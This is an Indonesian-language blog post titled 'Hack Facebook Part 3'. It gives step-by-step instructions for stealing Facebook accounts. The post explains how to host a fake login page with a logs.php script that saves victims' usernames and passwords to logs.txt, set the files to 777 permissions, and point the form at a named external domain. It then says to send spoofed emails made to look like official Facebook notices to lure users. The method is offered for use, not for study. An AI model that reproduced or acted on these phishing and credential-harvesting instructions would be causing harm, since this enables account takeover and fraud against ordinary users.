File Online: Lanjutan dari Hack Facebook Part 3

Wednesday, December 28, 2016

Lanjutan dari Hack Facebook Part 3

Nich gan kalo kurang jelas dari hasil postinagan yang tadi ok langsung and jangn lupa FOLLOW Blog gua ya gan,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Setahu gw sih salah satu cara untuk ngedapetin account facebook orang lain yang paling mungkin adalah pake metode social engineering atau keylogging. Tanpa kita bersentuhan dengan pemilik account-nya, keknya agak mustahil nurut gw?

Atau mo pake tool password attacker macam Brutus??? Mmmh… gw kira metode itu malah jadi Facebook Freezer ntar akhirnya… Wkakak…

Udah baca coretan gw tentang Fake Email pake Easymail ? Masih ingat kasus website plesetan www.klikBCA.com punyane Steven Haryanto? Yup… seperti itulah kayaknya yang akan cuba gw share dimari.

Langsung aja, pertama kita kudu punya hosting-an untuk naruh file / script fake login kita. (Atau klo lumayan tajir, boleh tuh borong domain yang hurupnya agak mirip – mirip Facebook macam Steven borong plesetan klikBCA.. )

Untuk file yang musti kita upload ada 3 (index.html, logs.php, logs.txt). Klo bisa, buat Change Permissions untuk ke 3 file tersebut ke 777 ( can read, write and executed )

Khusus untuk file index.html, cari baris ini (klo kita edit pake Macromedia Dreamweaver keknya pada baris ke 38 ) :

It’s free and anyone can join

http://sirs-banjarnegara.com/Facebook/logs.php“>

Javascript is disabled on your browser.

Please enable JavaScript on your browser or upgrade to a Javascript-capable browser to register for Facebook.

Untuk script action-nya (yang gw bold), kita ganti sesuai lokasi 3 file tersebut kita upload-kan.

Lanjut, cuba test dulu projectnya jalan pa gak. Boleh cuba link ini : http://sirs-banjarnegara.com/Facebook/.

Untuk nyobanya, isikan sembarang account pada username and passwordnya. Lalu klik Sign In.

Dan klo sukses, maka halaman browser kita akan di arahkan pada halaman asli login atempt Facebook .

Lalu coba kita liat hasilnya di file logs.txt-nya. Gmana..?

Langkah terakhir, sebarkan fake email, gunakan tool Easymail atau tool apa kek yang bisa bikin email palsu, dengan sender email dari salah satu account mail resminya Facebook. Untuk messagenya, liat aja email pemberitahuan resmi dari Facebook, buat semirip mungkin, kondisikan yang harus dia klik adalah link ke perangkap yang dah kita pasang.

Dan spertinya, dari sekian banyak pengguna Facebook, paling gak lebih dari 30% yang tahu tipuan model kek gini. Pa lagi yang gunakan mobile untuk mengaksesnya. So, tunggu apa lagi ? Lets Try…!

Available link for download